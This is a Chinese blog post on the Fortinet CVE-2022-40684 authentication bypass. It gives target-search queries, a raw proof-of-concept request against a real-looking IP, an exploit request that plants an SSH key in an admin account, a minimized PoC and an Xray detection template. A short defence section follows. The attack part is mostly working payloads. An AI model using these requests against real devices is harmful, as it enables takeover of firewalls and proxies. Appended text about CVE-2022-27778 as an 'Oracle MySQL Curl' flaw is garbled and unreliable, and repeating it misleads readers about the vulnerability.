CVE-2022-40684 Fortinet(飞塔)身份验证绕过漏洞

GitHub地址:

https://github.com/hughink/CVE-2022-40684

漏洞简介

Fortinet(飞塔)是一家全球知名的网络安全产品和安全解决方案提供商,其产品包括防火墙、防病毒软件、入侵防御系统和终端安全组件等。在受影响的FortiOS、FortiProxy 和 FortiSwitchManager产品的管理界面中,可以通过使用备用路径或通道绕过身份验证,并在未经认证的情况下通过特制的HTTP或HTTPS请求对管理界面进行操作。

影响版本

  • FortiOS 版本 7.2.0 - 7.2.1

  • FortiOS 版本 7.0.0 - 7.0.6

  • FortiProxy 版本 7.2.0

  • FortiProxy 版本 7.0.0 - 7.0.6

  • FortiSwitchManager 版本 7.2.0

  • FortiSwitchManager 版本 7.0.0

搜索语法

title="FortiProxy"

title="FortiGate"

Poc数据包

GET /api/v2/cmdb/system/admin HTTP/2Host: 35.192.137.121User-Agent: Node.jsAccept-Encoding: gzip, deflateAccept: */*Hosts: 127.0.0.1:9980Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=X-Forwarded-Vdom: root

Exp数据包

PUT /api/v2/cmdb/system/admin/用户名 HTTP/2Host: 目标User-Agent: Report RunnerAccept-Encoding: gzip, deflateAccept: */*Connection: closeForwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"Content-Length: 589Content-Type: application/json
{"ssh-public-key1": "\"公钥内容\""}

漏洞复现

经过实验发现User-Agent只能为Node.js,Hosts可以删除,Forwarded中by和for的值可以为空,X-Forwarded-Vdom可以是任意值,最精简Poc:

GET /api/v2/cmdb/system/admin HTTP/2Host: 35.192.137.121User-Agent: Node.jsAccept-Encoding: gzip, deflateAccept: */*Forwarded: by=""for=""X-Forwarded-Vdom: abcd

测试结果如图,想了想美国IP就算打码了:

漏洞利用部分就查看hughink的GitHub吧,写的挺详细的。

Xray Poc

name: poc-yaml-Fortinet-CVE-2022-40684manual: truetransport: httprules:    r1:        request:            method: GET            path: /api/v2/cmdb/system/admin            headers:                User-Agent: Node.js                Forwarded: by=""for=""                X-Forwarded-Vdom: root            follow_redirects: false        expression:            response.status==200 && response.body.bcontains(b"revision") && response.body.bcontains(b"q_origin_key")expression:    r1()detail:    author: Infiltrator    links:        - https://github.com/NHPT

漏洞检测结果:

防护建议

除了升级版本安装补丁外,由于User-Agent的值固定,Forwarded和X-Forwarded-Vdom存在,所以特征还是很明显的,设置WAF策略应该也是不容易绕过的。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
### 回答1: 此CVE-2022-27778漏洞影响的是Oracle、MySQL和Curl三个组件。该漏洞存在验证错误问题,可能导致攻击者在没有身份验证的情况下,对数据库进行未授权访问或在Curl上执行恶意代码。需要及时更新相关组件以修复该漏洞。 ### 回答2: Oracle MySQL Curl组件输入验证错误漏洞CVE-2022-27778)是一个严重的漏洞,它可能导致攻击者利用网络渗透到系统中,获取敏感信息或执行恶意代码,从而导致系统被攻击者完全控制。 该漏洞的根本原因是由于MySQL中的Curl组件在处理输入时没有正确验证用户提供的数据,从而使攻击者有机会向系统中注入恶意代码。由于这个组件在很多地方都被使用,攻击者可以通过许多方式来利用这个漏洞,例如通过Web应用程序、邮件客户端或其他方式。 为了防止这种漏洞的利用,系统管理员可以采取以下几个措施: 1. 及时更新相关的补丁程序,以便修复该漏洞。Oracle发布了一份安全公告,提供了一些在修复该漏洞时需要执行的操作。系统管理员可以按照这些指南来安装相关的安全补丁程序,并遵循最佳的实践,例如备份系统数据、测试补丁程序等。 2. 对所有输入的数据进行严格的验证,以便保证用户提供的数据是正确的和合法的。这包括用户的用户名、密码、电子邮件地址等敏感数据。系统管理员可以使用一些常见的验证库,例如OWASP ESAPI,来帮助他们执行这些操作。 3. 升级所有相关的依赖库和软件,以确保它们都最新的版本,并且不包含已知的安全漏洞。这些软件包括MySQL、Curl和其他常见的工具和库。 总之,Oracle MySQL Curl组件输入验证错误漏洞CVE-2022-27778)是一个非常严重的漏洞,需要系统管理员采取及时有效的措施进行修复和防范。只有这样,才能保证您的系统安全,并避免遭受攻击者的攻击和入侵。 ### 回答3: CVE-2022-27778是Oracle MySQL Curl组件中的输入验证错误漏洞,该漏洞可能允许攻击者利用缺陷导致拒绝服务或执行任意代码。 该漏洞影响Oracle MySQL 8.0.27以前版本中的Curl组件。具体而言,该漏洞是由于MySQL Curl组件未正确验证输入而引起的。攻击者可以通过发送特定构造的请求来利用该漏洞。 如果攻击成功,则攻击者可以利用该漏洞来执行任意代码或拒绝服务攻击。攻击者可以利用该漏洞使服务器崩溃或进入不稳定状态,从而影响用户访问和使用。 针对该漏洞,建议用户立即安装官方推荐的补丁程序或更新至最新版本。同时,建议用户限制网络访问以及采取其他安全措施,如访问控制和安全审计等,以最大程度地提高系统安全性。此外,建议用户保持和升级安全软件和操作系统,以最大程度地减少安全漏洞对服务器造成的影响。 总之,CVE-2022-27778是一个严重的安全漏洞,可能导致服务器崩溃或被入侵。因此,用户应该尽快采取必要的措施来防范和解决此问题,以确保系统的安全性和稳定性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

江左盟宗主

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值